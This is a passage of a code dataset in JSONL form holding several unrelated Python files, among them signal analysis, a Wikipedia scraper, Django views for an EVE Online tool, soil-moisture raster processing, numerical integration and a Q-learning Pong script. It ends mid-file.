  group('Scaling')\r\n    # the scale of a spectrum\r\n    scale = field.float_(default=1.0, step=1.0)\r\n    # whether to scale a spectrum or not\r\n    use_scale = field.bool_(default=False)\r\n    # * When the client-side name is not specified,\r\n    # 
the attribute name will be used instead.\r\n\r\n # define another group (in the global scope)\r\n group('Window')\r\n # the name of a window function\r\n window_name = field.str_('Window', default='hann')\r\n\r\n # define the validation of the property (window names in scipy)\r\n @window_name.validate\r\n def validate_window_name(self, value: str):\r\n return value in [\r\n 'boxcar',\r\n 'triang',\r\n 'blackman',\r\n 'hamming',\r\n 'hann',\r\n 'bartlett',\r\n 'flattop',\r\n 'parzen',\r\n 'bohman',\r\n 'blackmanharris',\r\n 'nuttall',\r\n 'barthann',\r\n ]\r\n\r\n # define the callback of the properties\r\n @window_size.compute\r\n @window_name.compute\r\n def update_window(self):\r\n self.window = sp.signal.get_window(\r\n self.window_name,\r\n self.window_size,\r\n )\r\n self.window_sum = self.window.sum() ** 2.0\r\n\r\n def __init__(self):\r\n # require to call the callbacks above in the initializer\r\n # (not called automatically)\r\n self.update_window()\r\n\r\n def analyze(self, signal: np.ndarray):\r\n # from (frames, channels) to (channels, frames)\r\n signal = signal.T\r\n # multiply the window\r\n signal *= self.window\r\n # calculate the one side of the power spectrum\r\n spectrum = np.abs(np.fft.rfft(signal, axis=1)) ** 2\r\n\r\n if self.use_scale:\r\n spectrum *= self.scale\r\n\r\n # send the result to the client side\r\n return {\r\n # 1D numpy array can be sent directly\r\n 'window': self.window,\r\n # Multi-dimensional numpy array must be converted\r\n # into the Python list of the 1D numpy arrays\r\n # because there is no multi-dimensional JavaScript TypedArray.\r\n 'spectrum': list(spectrum),\r\n }\r\n","repo_name":"accup/VyJit","sub_path":"analyzers/stft/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44802878355","text":"import pandas as pd\nimport numpy as np\nimport wikipedia as wiki\nfrom bs4 import BeautifulSoup\nfrom progress.bar import IncrementalBar\n\nplayers = pd.read_csv(\"data/final_19.csv\", sep=\";\")[\"Nome\"].unique()\n\n\ndef main():\n age = []\n i = 0\n for player in IncrementalBar(\"Drafting\").iter(players):\n try:\n html = wiki.page(player).html()\n soup = BeautifulSoup(html, \"html5lib\")\n except:\n try:\n html = wiki.page(player + \" (football)\").html()\n soup = BeautifulSoup(html, \"html.parser\")\n except:\n age.append(np.nan)\n continue\n try:\n age_info = (\n soup.find(\"span\", attrs={\"class\": \"ForceAgeToShow\"})\n .text.replace(\" (age\\xa0\", \"\")\n .replace(\")\", \"\")\n )\n except:\n age_info = np.nan\n age.append(age_info)\n df = pd.DataFrame()\n df.loc[:, \"Player\"] = players\n df.loc[:, \"age\"] = age\n df.to_csv(\"age_wiki.csv\", sep=\",\", index=False)\n print(df)\n\n\nmain()\n","repo_name":"FDRienzo/FantacalcioAnalisi","sub_path":"find_age.py","file_name":"find_age.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34845907923","text":"from datetime import datetime, timedelta\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom typing import Iterable\nfrom django.contrib import messages\nfrom django.utils.translation import gettext as gt\nfrom django.conf import settings\n\nfrom esi.decorators import token_required\nfrom allianceauth.eveonline.models import EveCharacter\nfrom allianceauth.services.hooks 
import get_extension_logger\n\nfrom .tasks import process_scan, import_extraction_data\nfrom .models import Resource, TrackingCharacter, Extraction, EveMoon\nfrom .providers import ESI_CHARACTER_SCOPES\n\nlogger = get_extension_logger(__name__)\n\n# Get refine setting\nrefine = .876\nif hasattr(settings, 'MOON_REFINE_PERCENT'):\n if settings.MOON_REFINE_PERCENT > 1:\n refine = settings.MOON_REFINE_PERCENT / 100\n else:\n refine = settings.MOON_REFINE_PERCENT\n\n# Get Default Extraction View setting\nextraction_view = \"Calendar\"\nif hasattr(settings, \"DEFAULT_EXTRACTION_VIEW\"):\n extraction_view = settings.DEFAULT_EXTRACTION_VIEW\n\n\ndef _get_resource_values(resources: Iterable[Resource]) -> dict:\n \"\"\"\n Returns a dict containing the per-m3 values for a given list of resources.\n :param resources:\n :return:\n \"\"\"\n ret = dict()\n\n for resource in resources:\n value = 0\n mats = resource.ore.materials.all()\n for mat in mats:\n ore_volume = resource.ore.volume\n amount = mat.quantity\n mat_value = mat.material_eve_type.market_price.average_price\n value += (((amount / 100) * refine) * mat_value) / ore_volume\n ret[resource.ore.id] = value\n\n return ret\n\n\ndef _get_moon_value_dict(moon_id: int) -> dict:\n \"\"\"\n Returns a dict containing the per-m3 values of the moon's resources\n :param moon_id: The id of the moon.\n :return:\n \"\"\"\n resources = Resource.objects\\\n .prefetch_related('ore', 'ore__materials', 'ore__materials__material_eve_type__market_price')\\\n .filter(moon__id=moon_id)\n\n ret = _get_resource_values(resources)\n\n return ret\n\n\ndef _get_extractions(limit=None):\n \"\"\"\n Gets a dict of extractions from beginning of the current.\n :param limit: Number of days out to go. (Default: None - Will grab ALL extractions)\n :return:\n \"\"\"\n if limit:\n qs = Extraction.objects.select_related('moon')\\\n .filter(arrival_time__gte=datetime.utcnow().replace(day=1),\n arrival_time__lte=datetime.utcnow()+timedelta(days=limit),\n cancelled=False)\\\n .prefetch_related('moon__resources', 'moon__resources__ore', 'refinery')\\\n .order_by('arrival_time')\n else:\n qs = Extraction.objects.select_related('moon')\\\n .filter(arrival_time__gte=datetime.utcnow().replace(day=1),\n cancelled=False)\\\n .prefetch_related('moon__resources', 'moon__resources__ore', 'refinery')\\\n .order_by('arrival_time')\n\n return qs\n\n\ndef _build_event_dict(qs):\n ret = [\n {\"title\": q.refinery.name,\n \"start\": datetime.strftime(q.arrival_time, '%Y-%m-%dT%H:%M:%S%z'),\n \"moon\": q.moon.name,\n \"rarity\": [r.rarity for r in q.moon.resources.all()],\n \"moon_id\": q.moon.id}\n for q in qs\n ]\n\n return ret\n\n\n# Create your views here.\n@login_required\n@permission_required('moonstuff.access_moonstuff')\ndef dashboard(request):\n \"\"\"\n The main view for moonstuff.\n :param request: HTTPRequest object\n :return:\n \"\"\"\n ctx = dict()\n\n # Get upcoming extraction events (calendar)\n extractions = _get_extractions()\n events = _build_event_dict(extractions)\n\n # Get moons\n moons = EveMoon.objects.filter(resources__isnull=False).distinct()\\\n .prefetch_related('resources',\n 'resources__ore',\n 'resources__ore__materials',\n 'resources__ore__materials__material_eve_type__market_price',\n 'extractions',\n 'extractions__refinery',\n 'extractions__refinery__corp',\n 'eve_planet',\n 'eve_planet__eve_solar_system',\n 'eve_planet__eve_solar_system__eve_constellation__eve_region',\n )\n\n resources = tuple(set(res for moon in moons for res in moon.resources.all()))\n ctx['events'] 
= events\n ctx['extractions'] = extractions\n ctx['moons'] = moons\n ctx['resources'] = _get_resource_values(resources)\n ctx['default_view'] = extraction_view\n return render(request, 'moonstuff/dashboard.html', ctx)\n\n\n@login_required\n@permission_required('moonstuff.add_resource')\ndef add_scan(request):\n \"\"\"\n View for adding moon scan data.\n :param request: HTTPRequest object\n :return:\n \"\"\"\n if request.method == 'POST':\n scan_data = request.POST['scan']\n\n process_scan.delay(scan_data, request.user.id)\n messages.success(request, gt('Your moon scan is being processed. Depending on size this may take some time.'))\n return redirect('moonstuff:dashboard')\n\n return render(request, 'moonstuff/add_scan.html')\n\n\n@login_required\n@token_required(scopes=ESI_CHARACTER_SCOPES)\n@permission_required('moonstuff.add_trackingcharacter')\ndef add_character(request, token):\n \"\"\"\n View for adding tracking character and corresponding token.\n :param request: HTTPRequest object\n :param token: django-esi Token object\n :return:\n \"\"\"\n\n eve_char = EveCharacter.objects.get(character_id=token.character_id)\n if not TrackingCharacter.objects.filter(character=eve_char).exists():\n messages.success(request, gt('Character added!'))\n char = TrackingCharacter(character=eve_char)\n char.save()\n\n # Schedule an import task to pull data from the new Tracking Character.\n import_extraction_data.delay()\n else:\n messages.error(request, gt('That character is already being tracked!'))\n\n return redirect('moonstuff:dashboard')\n\n\n@login_required\n@permission_required('moonstuff.access_moonstuff')\ndef moon_info(request, moon_id=None):\n \"\"\"\n View for viewing a moon's data.\n :param request: HTTPRequest object\n :param moon_id: integer\n :return:\n \"\"\"\n ctx = {}\n if moon_id is None:\n messages.error(request, gt(\"Please provide the ID of a moon to view it's data.\"))\n return redirect('moonstuff:dashboard')\n\n # Get moon\n try:\n moon = EveMoon.objects.filter(id=moon_id, resources__isnull=False)\\\n .prefetch_related('extractions',\n 'extractions__refinery',\n 'resources',\n 'resources__ore',\n )[0]\n ctx['resources'] = _get_moon_value_dict(moon_id)\n ctx['moon'] = moon\n except EveMoon.DoesNotExist:\n messages.error(request, gt('A moon matching the provided ID could not be found.'))\n return redirect('moonstuff:dashboard')\n\n if request.is_ajax():\n return render(request, 'moonstuff/moon_info_ajax.html', ctx)\n return render(request, 'moonstuff/moon_info.html', ctx)\n","repo_name":"staropera/aa-moonstuff","sub_path":"moonstuff/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70613854132","text":"from attr import s\nimport numpy as np\nimport os\nimport rasterio\nimport gc\n\nfrom utils import reproj_match, write_image\n\nSSM_FLAGS = {\n \"nodata\": 255,\n \"max\": 242,\n \"min\": 241,\n \"water\": 251,\n \"sensitivity\": 252,\n \"slope\": 253\n}\n\ndef mask_ssm(array, flag_list):\n \n flag_mask = np.zeros_like(array)\n \n # then we will loop through the flags and add the \n for flag in flag_list:\n # get the mask for this flag\n flag_mask[array == SSM_FLAGS[flag]] = 1\n\n return flag_mask\n\ndef ssm2volumetric(ssm:str, mask:str, clay:str, sand:str, savepath:str, fname:str = None, ext:str = \"vol\", nodata:float = None)->str:\n\n if fname is None:\n fname = os.path.splitext(ssm)[0] + \"_\" + ext + \".tif\"\n \n rclay = 
os.path.splitext(clay)[0] + \"_reproj.tif\"\n    \n    reproj_match(clay, ssm, rclay)\n\n    rsand = os.path.splitext(sand)[0] + \"_reproj.tif\"\n    \n    reproj_match(sand, ssm, rsand)\n    \n    SSM = rasterio.open(ssm)\n    metadata = SSM.meta.copy()\n    MASK = rasterio.open(mask)\n    CLAY = rasterio.open(rclay)\n    SAND = rasterio.open(rsand)\n    \n    clay_array = CLAY.read().astype(np.float32)\n    sand_array = SAND.read().astype(np.float32)\n\n    theta_res = 0.15 * clay_array*0.01\n    theta_sat = 0.489 - 0.126 * sand_array*0.01\n    \n    del(clay_array, sand_array)\n    gc.collect()\n\n    ssm_array = SSM.read().astype(np.float32)\n    mask = MASK.read()\n\n    ssm_vol_array = theta_res + (theta_sat - theta_res) * ssm_array * 0.01\n    if nodata is None:\n        ssm_vol_array[mask == 1] = metadata[\"nodata\"]\n    else:\n        ssm_vol_array[mask == 1] = nodata\n        metadata.update(nodata = nodata)\n\n    metadata.update(dtype = ssm_vol_array.dtype)\n\n    write_image(os.path.join(savepath, fname), ssm_vol_array, metadata)\n\n    return fname","repo_name":"rslab-ntua/DisPATCh","sub_path":"DisPATCh/ssm.py","file_name":"ssm.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}{"seq_id":"21739367291","text":"import numpy as np\nimport skimage\n\ndef predict_mask(model, image_path, image_size, patch_size):\n    latticeMovieImage = skimage.external.tifffile.imread(image_path)\n    latticeMovieImage = latticeMovieImage[:image_size, :image_size, :image_size]\n    result = np.zeros((image_size, image_size, image_size, 1))\n\n    for x in range(image_size//patch_size):\n        for y in range(image_size//patch_size):\n            for z in range(image_size//patch_size):\n                x_index = x*patch_size\n                y_index = y*patch_size\n                z_index = z*patch_size\n                \n                current_lattice_patch = latticeMovieImage[x_index:x_index+patch_size, y_index:y_index+patch_size, z_index:z_index+patch_size]\n                current_lattice_patch = current_lattice_patch.reshape(1, patch_size, patch_size, patch_size, 1)\n                \n                result_patch = model.predict(current_lattice_patch)\n                for i in range(patch_size):\n                    for j in range(patch_size):\n                        for k in range(patch_size):\n                            result_pixel = result_patch[0, i, j, k, 0]\n                            result[x_index+i, y_index+j, z_index+k, 0] = result_pixel\n                \n    return result.reshape(1, image_size, image_size, image_size, 1)\n\n#Automatically trim image of rectangular shape and generate patches\ndef predict_mask(model, image_path, patch_size, offset=np.zeros((3,), dtype=int)):\n    # '==' rather than 'is': identity comparison against an int literal is unreliable\n    assert offset.size == 3, \"Offset array needs to have a size of 3.\"\n    \n    latticeMovieImage = skimage.external.tifffile.imread(image_path)\n    x_extra = latticeMovieImage.shape[0]%patch_size\n    x_size = latticeMovieImage.shape[0] - x_extra\n    if offset[0] > x_extra:\n        print(\"1st dim offset exceeds image dim\")\n        offset[0] = 0\n    \n    y_extra = latticeMovieImage.shape[1]%patch_size\n    y_size = latticeMovieImage.shape[1] - y_extra\n    if offset[1] > y_extra:\n        print(\"2nd dim offset exceeds image dim\")\n        offset[1] = 0\n    \n    z_extra = latticeMovieImage.shape[2]%patch_size\n    z_size = latticeMovieImage.shape[2] - z_extra\n    if offset[2] > z_extra:\n        print(\"3rd dim offset exceeds image dim\")\n        offset[2] = 0\n    \n    latticeMovieImage = latticeMovieImage[offset[0]:x_size+offset[0], offset[1]:y_size+offset[1], offset[2]:z_size+offset[2]]\n    print(\"Image cropped to: \" + str(x_size) + \", \" + str(y_size) + \", \" + str(z_size))\n    result = np.zeros((x_size, y_size, z_size, 1))\n\n    for x in range(x_size // patch_size):\n        for y in range(y_size // patch_size):\n            for z in range(z_size // patch_size):\n                x_index 
= x * patch_size\n                y_index = y * patch_size\n                z_index = z * patch_size\n\n                current_lattice_patch = latticeMovieImage[x_index:x_index + patch_size, y_index:y_index + patch_size,\n                                        z_index:z_index + patch_size]\n                current_lattice_patch = current_lattice_patch.reshape(1, patch_size, patch_size, patch_size, 1)\n\n                result_patch = model.predict(current_lattice_patch)\n                for i in range(patch_size):\n                    for j in range(patch_size):\n                        for k in range(patch_size):\n                            result_pixel = result_patch[0, i, j, k, 0]\n                            result[x_index + i, y_index + j, z_index + k, 0] = result_pixel\n\n    return result.reshape(1, x_size, y_size, z_size, 1)","repo_name":"abdo-projects/pyLattice_deepLearning","sub_path":"src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}{"seq_id":"3370710363","text":"import numpy as np\r\n\r\n\r\ndef moments(max_s, xl, xr, a=None, b=None, alpha=0.0, beta=0.0):\r\n    \"\"\"\r\n    Compute the moments of the weight function, from the 0th through the max_s-th, on the interval [xl, xr]\r\n    The weight function is p(x) = 1 / (x-a)^alpha / (b-x)^beta, where it is guaranteed that:\r\n    1) 0 <= alpha < 1\r\n    2) 0 <= beta < 1\r\n    3) alpha * beta = 0\r\n\r\n    :param max_s: index of the last moment\r\n    :return: list of moment values\r\n    \"\"\"\r\n    assert alpha * beta == 0, f'alpha ({alpha}) and/or beta ({beta}) must be 0'\r\n\r\n    if alpha == 0 and beta == 0:\r\n        return [(xr ** s - xl ** s) / s for s in range(1, max_s + 2)]\r\n\r\n    if alpha != 0.0:\r\n        assert a is not None, f'\"a\" not specified while alpha != 0'\r\n\r\n        array = []\r\n        for s in range(0, max_s + 1):\r\n            sum = 0\r\n            for i in range(1, s + 2):\r\n                to_add = 0\r\n                to_add += (xr - a) ** (-alpha + i) * xr ** (s + 1 - i) * (-1) ** (i + 1)\r\n                to_add -= (xl - a) ** (-alpha + i) * xl ** (s + 1 - i) * (-1) ** (i + 1)\r\n\r\n                for k in range(1, i + 1):\r\n                    to_add /= (-alpha + k)\r\n\r\n                for k in range(0, i - 1):\r\n                    to_add *= s - k\r\n\r\n                sum += to_add\r\n            array.append(sum)\r\n\r\n        return array\r\n    if beta != 0.0:\r\n        assert b is not None, f'\"b\" not specified while beta != 0'\r\n\r\n        array = []\r\n        for s in range(0, max_s + 1):\r\n            sum = 0\r\n            for i in range(1, s + 2):\r\n                to_add = 0\r\n                to_add -= (b - xr) ** (-beta + i) * xr ** (s + 1 - i)\r\n                to_add += (b - xl) ** (-beta + i) * xl ** (s + 1 - i)\r\n                for k in range(1, i + 1):\r\n                    to_add /= (-beta + k)\r\n\r\n                for k in range(0, i - 1):\r\n                    to_add *= s - k\r\n                sum += to_add\r\n\r\n            array.append(sum)\r\n\r\n        return array\r\n\r\n\r\ndef runge(s0, s1, m, L):\r\n    \"\"\"\r\n    Error estimate for the successive approximations s0 and s1 by Runge's rule\r\n\r\n    :param m: order of the error\r\n    :param L: step refinement factor\r\n    :return: error estimates for s0 and s1\r\n    \"\"\"\r\n    d0 = np.abs(s1 - s0) / (1 - L ** -m)\r\n    d1 = np.abs(s1 - s0) / (L ** m - 1)\r\n    return d0, d1\r\n\r\n\r\ndef aitken(s0, s1, s2, L):\r\n    \"\"\"\r\n    Estimate the order of the leading error term from the successive approximations s0, s1 and s2 by Aitken's rule\r\n    We assume the error has the form R(h) = C*h^m + o(h^m)\r\n\r\n    :param L: step refinement factor\r\n    :return: estimate of the order of the leading error term (m)\r\n    \"\"\"\r\n    # We return -1 when two quadrature sums coincide, or when the expression under the\r\n    # logarithm is negative (the sums may lie on opposite sides of the exact value of\r\n    # the integral); in that case the estimate of the parameter m is only a rough one.\r\n    if s2 == s1 or s1 == s0 or ((s2-s1)/(s1-s0) < 0):\r\n        return -1\r\n    else:\r\n        return -np.log((s2-s1)/(s1-s0))/np.log(L)\r\n\r\n\r\ndef quad(func, x0, x1, xs, **kwargs):\r\n    \"\"\"\r\n    Interpolatory quadrature formula\r\n\r\n    :param func: function to integrate\r\n    :param x0, x1: interval\r\n    :param xs: nodes\r\n    :param kwargs: weight function parameters (passed through to moments)\r\n    :return: value of the quadrature formula\r\n    \"\"\"\r\n    m = moments(len(xs) - 1, x0, x1, **kwargs)\r\n\r\n    X = []\r\n\r\n    for i in range(len(m)):\r\n        v = []\r\n        for s in xs:\r\n            v.append(s ** i)\r\n        X.append(v)\r\n\r\n    A = np.linalg.solve(X, m)\r\n\r\n    Fx = []\r\n\r\n    for s in xs:\r\n        Fx.append(func(s))\r\n\r\n    result = np.dot(A, Fx)\r\n    return result\r\n\r\n\r\ndef quad_gauss(func, x0, x1, n, **kwargs):\r\n    \"\"\"\r\n    Gauss-type interpolatory quadrature formula\r\n\r\n    :param func: function to integrate\r\n    :param x0, x1: interval\r\n    :param n: number of nodes\r\n    :param kwargs: weight function parameters (passed through to moments)\r\n    :return: value of the quadrature formula\r\n    \"\"\"\r\n\r\n    m = np.array(moments(2*n - 1, x0, x1, **kwargs))\r\n\r\n    C = []\r\n    B = []\r\n\r\n    for s in range(n):\r\n        v = []\r\n        for j in range(n):\r\n            v.append(m[j+s])\r\n        C.append(v)\r\n        B.append(-m[n+s])\r\n\r\n    if np.linalg.det(C) == 0:\r\n        return 0\r\n\r\n    A = np.flip(np.linalg.solve(C, B)) # reverse the coefficient order for building the nodal polynomial\r\n    A = np.insert(A, 0, 1) # prepend the missing leading coefficient (equal to 1 by the algorithm) of the nodal polynomial\r\n    X = np.roots(A)\r\n    return quad(func, x0, x1, X, **kwargs)\r\n\r\n\r\ndef composite_quad(func, x0, x1, n_intervals, n_nodes, **kwargs):\r\n    \"\"\"\r\n    Composite quadrature formula\r\n\r\n    :param func: function to integrate\r\n    :param x0, x1: interval\r\n    :param n_intervals: number of intervals\r\n    :param n_nodes: number of nodes on each interval\r\n    :param kwargs: weight function parameters (passed through to moments)\r\n    :return: value of the composite quadrature formula\r\n    \"\"\"\r\n    mesh = np.linspace(x0, x1, n_intervals + 1)\r\n    return sum(quad(func, mesh[i], mesh[i+1], interval(n_nodes, mesh[i], mesh[i+1]), **kwargs) for i in range(n_intervals))\r\n\r\ndef interval(n, xl, xr):\r\n    if n == 1:\r\n        return[0.5*(xl+xr)] # with a single node, place it at the midpoint\r\n    else:\r\n        return np.linspace(xl, xr, n) # use equally spaced nodes\r\n\r\ndef integrate(func, x0, x1, tol):\r\n    \"\"\"\r\n    Integration to a given accuracy (error <= tol)\r\n\r\n    Estimate convergence by Aitken's rule, then estimate the error by Runge's rule and choose the optimal step size\r\n    Repeat until the error estimate fits within tol\r\n\r\n    :param func: function to integrate\r\n    :param x0, x1: interval\r\n    :param tol: tolerance\r\n    :return: value of the integral, error estimate\r\n    \"\"\"\r\n    N = 1 #intervals\r\n    n_nodes = 2 #nodes\r\n    L = 2\r\n\r\n    S_0 = composite_quad(func, x0, x1, N, n_nodes)\r\n    N *= L\r\n    S_1 = composite_quad(func, x0, x1, N, n_nodes)\r\n    N *= L\r\n    S_2 = composite_quad(func, x0, x1, N, n_nodes)\r\n\r\n    m = aitken(S_0, S_1, S_2, L)\r\n\r\n    d0, d1 = runge(S_0, S_1, m, L)\r\n\r\n    while d1 > tol: # refine the meshes until the required computation accuracy (tol) is reached\r\n        S_0 = S_1\r\n        S_1 = S_2\r\n        N *= L\r\n        S_2 = composite_quad(func, x0, x1, N, n_nodes)\r\n        m = aitken(S_0, S_1, S_2, L)\r\n        d0, d1 = runge(S_0, S_1, m, L)\r\n    \r\n    return S_1, d1\r\n","repo_name":"ACE-777/CHM","sub_path":"S3T1_integration/py/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":8129,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"15244593541","text":"# Given a number N. Find Sum of 1 to N Using Recursion\n\n# Input\n# 5\n\n# Output\n# 15\n\n# Hints\n# Make a recursive function to get the sum\n\n# Code\nn = int(input(\"Enter no to find sum: \"))\n\n\ndef recursion(n):\n    if n == 0:\n        return n\n    return recursion(n-1) + n\n\n\ntotal = recursion(n)\nprint(total)\n","repo_name":"nandinichhajed/Python-Codes","sub_path":"Day-24/103.Sum of 1 to N Using Recursion.py","file_name":"103.Sum of 1 to N Using Recursion.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}{"seq_id":"26682406290","text":"class Save:\r\n\tdef __init__(self, hp, ep, lv):\r\n\t\tself.hp = hp\r\n\t\tself.ep = ep\r\n\t\tself.lv = lv\r\n\tdef notification(self):\r\n\t\t# the attributes are ints, so they must be converted before concatenation\r\n\t\tprint('HP : ' + str(self.hp))\r\n\t\tprint('EP : ' + str(self.ep))\r\n\t\tprint('Lv : ' + str(self.lv))\r\n\r\nlv_a = 23\r\nep_a = 12\r\nhp_a = 2\r\n\r\nlv_b = 99\r\nep_b = 999\r\nhp_b = 999\r\n\r\nsave_data_a = Save(hp_a, ep_a, lv_a)\r\nsave_data_b = Save(hp_b, ep_b, lv_b)\r\n\r\n# notification() prints and returns None, so call it directly instead of printing its return value\r\nsave_data_a.notification()\r\nsave_data_b.notification()","repo_name":"nyqtofovian/py_folder","sub_path":"test14.py","file_name":"test14.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"1338686968","text":"from sklearn import tree, neighbors, svm\r\nimport numpy as np\r\nfrom random import shuffle\r\n\r\nx=[]\r\nl=[]\r\ntest_x=[]\r\ntest_l=[]\r\n\r\nfor i in range(10000):\r\n    rnd = np.random.randint(0, high=2)\r\n    if rnd == 0:\r\n        y=[]\r\n        y.append(np.random.randint(100,high=200))\r\n        y.append(np.random.randint(10,high=25))\r\n        x.append(y)\r\n        l.append(1)\r\n    else:\r\n        y=[]\r\n        y.append(np.random.randint(150,high=250))\r\n        y.append(np.random.randint(15,high=35))\r\n        x.append(y)\r\n        l.append(2)\r\n\r\ntest_x = x[-100:]\r\ntest_l = l[-100:]\r\n\r\nsum_acc=[]\r\nfor i in range(50):\r\n##    clf = tree.DecisionTreeClassifier()\r\n##    clf = neighbors.KNeighborsClassifier()\r\n    clf = svm.SVC()\r\n    clf.fit(x[:900],l[:900])\r\n    acc=clf.score(test_x,test_l)\r\n    sum_acc.append(acc)\r\nprint(np.mean(sum_acc))\r\n\r\n","repo_name":"moonblood2/opencv","sub_path":"googl_ml.py","file_name":"googl_ml.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"71178254132","text":"import random, itertools\nimport numpy as np\n\nclass State:\n    def __init__(self, ball, paddle, x_vel, y_vel):\n        self.ball_loc = ball\n        self.paddle_loc = paddle\n        self.x_vel = x_vel\n        self.y_vel = y_vel\n\n    def __hash__(self):\n        return hash((self.ball_loc, self.x_vel, self.y_vel, self.paddle_loc))\n\n    def __eq__(self, other):\n        if self.ball_loc == other.ball_loc and self.paddle_loc == other.paddle_loc \\\n            and self.x_vel == other.x_vel and self.y_vel == other.y_vel:\n            return True\n        return False\n\n    def __ne__(self, other):\n        return not self.__eq__(other)\n\n    def __repr__(self):\n        return str((self.ball_loc, self.x_vel, self.y_vel, self.paddle_loc))\n\n    def fail(self):\n        if self == State((-1,-1), 0, 0, 0):\n            return True\n        return False\n\ndef random_state():\n    ball_x = random.uniform(0,1)\n    ball_y = random.uniform(0,1)\n    x_vel = .03 * random.choice([-1,1])\n    y_vel = .03 * random.choice([-1,0,1])\n    paddle = random.uniform(0,.8)\n\n    return (ball_x, ball_y, x_vel, y_vel, paddle)\n\ndef main():\n    gamma = .9\n    paddle_height = .2\n    init_state = (.5, .5, .03, .01, .5 - paddle_height/2)\n    cur_state = init_state\n    states = {}\n    hit = 0\n    games = 0\n    alpha = .00005\n\n    for x 
in range(15):\n for y in range(15):\n for paddle in range(15):\n for xvel in [-1,1]:\n for yvel in [-1,0,1]:\n new_state = State((x,y), paddle, xvel, yvel)\n states[new_state] = (0,0,0)\n states[State((-1,-1), 0, 0, 0)] = (-1,-1,-1)\n\n while True:\n cur_state, states, hit = step(cur_state, states, hit, alpha, gamma)\n discrete = discretize(cur_state)\n if discrete.fail():\n games += 1\n # alpha = 1000/(1000 + games)\n # print(games)\n if games % 10000 == 0:\n count = 0\n xhit = 0\n while count < 1001:\n xhit += final_q(init_state, states, 0, 0)\n count += 1\n print(xhit/1000)\n # cur_state = random_state()\n cur_state = init_state\n hit = 0\n\n\ndef final_q(cur_state, states, hit, step):\n disc = discretize(cur_state)\n\n if disc.fail():\n return hit\n\n val = states[disc]\n if val[1] < val[0] > val[2]:\n new_state, _, n_hit = next_state(cur_state, 0, hit)\n elif val[0] < val[1] < val[2]:\n new_state, _, n_hit = next_state(cur_state, 2, hit)\n else:\n new_state, _, n_hit = next_state(cur_state, 1, hit)\n\n n_hit = final_q(new_state, states, n_hit, step+1)\n return n_hit\n\n\n\ndef print_board(state):\n for x in range(15):\n for y in range(15):\n if state.ball_loc == (x,y):\n print(\"o\", end='')\n elif x == 14 and y == state.paddle_loc:\n print('_', end='')\n else:\n print(' ', end='')\n print()\n print('-----------------------')\n\n\ndef step(state, discrete_states, hit, alpha, gamma):\n action = random.randint(0,2)\n disc = discretize(state)\n\n new_state, q, hit = next_state(state, action, hit)\n q += gamma * max_q(new_state, discrete_states)\n val = discrete_states[disc]\n td_val = val[action] + alpha*(q-val[action])\n\n if action == 0:\n discrete_states[disc] = (td_val, val[1], val[2])\n elif action == 1:\n discrete_states[disc] = (val[0], td_val, val[2])\n else:\n discrete_states[disc] = (val[0], val[1], td_val)\n\n return new_state, discrete_states, hit\n\n\ndef max_q(state, discrete_states):\n disc = discretize(state)\n val = discrete_states[disc]\n if val[1] < val[0] > val[2]:\n return val[0]\n elif val[0] < val[1] < val[2]:\n return val[2]\n else:\n return val[1]\n\ndef next_state(state, action, hit):\n new_xvelo = state[2]\n new_yvelo = state[3]\n reward = 0\n\n new_xpos = state[0] + state[2]\n if new_xpos < 0:\n new_xpos = -new_xpos\n new_xvelo = -new_xvelo\n\n new_ypos = state[1] + state[3]\n if new_ypos < 0:\n new_ypos = -new_ypos\n new_yvelo = -new_yvelo\n elif new_ypos > 1:\n new_ypos = 2 - new_ypos\n new_yvelo = -new_yvelo\n\n if new_xpos >= 1 and (state[4] <= new_ypos <= state[4] + .2):\n new_xpos = 2 - new_xpos\n u = random.uniform(-.015, .015)\n v = random.uniform(-.03, .03)\n new_xvelo = -new_xvelo + u\n if 0 < new_xvelo < .03:\n new_xvelo = .03\n elif -.03 < new_xvelo <= 0:\n new_xvelo = -.03\n new_yvelo += v\n hit += 1\n reward = 3\n elif new_xpos > 1:\n reward = -1\n\n if action == 0:\n new_paddle = state[4]\n elif action == 1:\n new_paddle = state[4] + .04\n if new_paddle > (1 - .2):\n new_paddle = .8\n elif action == 2:\n new_paddle = state[4] - .04\n if new_paddle < 0:\n new_paddle = 0\n\n new_state = (new_xpos, new_ypos, new_xvelo, new_yvelo, new_paddle)\n return new_state, reward, hit\n\ndef discretize(state):\n # if state[0] > 1:\n # import IPython\n # IPython.embed()\n if (state[0] >= 1 and not (state[4] <= state[1] <= state[4] + .2)):\n return State((-1,-1), 0, 0, 0)\n coords = (int(state[0]*14), int(state[1]*14))\n paddle = int(14 * state[4] / .8)\n if coords[0] >= 15:\n coords = (14, coords[1])\n\n if state[2] > 0:\n xvel = 1\n else:\n xvel = -1\n\n if 
